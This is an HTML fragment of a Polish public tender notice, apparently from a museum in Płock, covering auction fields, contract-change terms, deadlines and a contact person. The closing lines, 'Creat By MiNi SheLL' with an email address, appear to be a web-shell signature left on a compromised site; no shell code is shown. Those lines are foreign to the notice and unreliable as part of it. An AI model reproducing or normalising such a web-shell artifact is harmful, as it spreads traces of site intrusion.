id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zamawiający poza możliwością zmiany zawartej umowy na podstawie art. 144 ust. 1, pkt 2, 3, 4, 5 i 6ustawy Prawo zamówień publicznych dopuszcza możliwość zmiany umowy w sytuacjach określonychponiżej: w zakresie terminu wykonania umowy lub sposobu wykonania umowy, z następującychpowodów: 1) z powodu konieczności wykonania dokumentacji zamiennej; 2) wystąpienia robótdodatkowych lub zamiennych, jeżeli mają one wpływ na termin wykonania umowy; 3) wystąpieniawarunków atmosferycznych uniemożliwiających zachowanie technologii wykonania robót; strony zpowodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają niedogodnościzwiązane z warunkami atmosferycznymi charakterystycznymi dla danej pory roku; 4) zaistnieniaokoliczności leżących po stronie Zamawiającego, w szczególnościspowodowanych sytuacją finansową,zdolnościami płatniczymi lub warunkami organizacyjnymi; 5) gdy zaistnieje inna, niemożliwa doprzewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którążadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonaniaumowy, zgodnie z dokumentacją projektową oraz ze specyfikacją techniczną wykonania i odbioru robótbudowlanych; 6) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówieniaproponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dlaZamawiającego, a zmianą nie będą wprowadzone warunki, które gdyby zostały ujęte w ramachprocedury przetargowej udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż ta, którazostała pierwotnie dopuszczona oraz nie będą modyfikowały równowagi ekonomicznej umowy nakorzyść wykonawcy w sposób, który nie był przewidziany w postanowieniach pierwotnego zamówienia iwprowadzone zmiany nie są istotne w rozumieniu w art. 144 ust. 1e ustawy Prawo zamówień publiczn 7)zmiany personelu realizującego przedmiot zamówienia; zmiana osób wskazanych w ofercie, które będąuczestniczyć w wykonywaniu zamówienia, na inne osoby będzie możliwa pod warunkiem, że nowe osobybędą spełniać wymagania (warunki) opisane dla tej osoby w specyfikacji istotnych warunków zamówieniai w ofercie w postępowaniu o udzielenie zamówienia publicznego i będą zatrudnione na warunkach niegorszych niż zawartych w specyfikacji istotnych warunków zamówienia; W zakresie zmianywynagrodzenia z powodu zmiany stawki podatku VAT, jeżeli zmienią się przepisy w tym zakresie,dotyczyć będzie wynagrodzenia umownego, za prace wykonane po dacie podpisania aneksu do umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-09-19</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Publiczne otwarcie ofert nastąpi w dniu 25.09.2017 o godz. 12.00 w siedzibie Zamawiającego: MuzeumMazowieckie w Płocku 09-402 Płock, ul. Tumska 8 pok. 204B. Osobą uprawnioną do porozumiewaniasię z Wykonawcami jest Pani Marta Buss (dane kontaktowe: e-mail: biuro@pilamis.pl, tel. 42 278 22 63od poniedziałku do piątku w godzinach 9-15.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com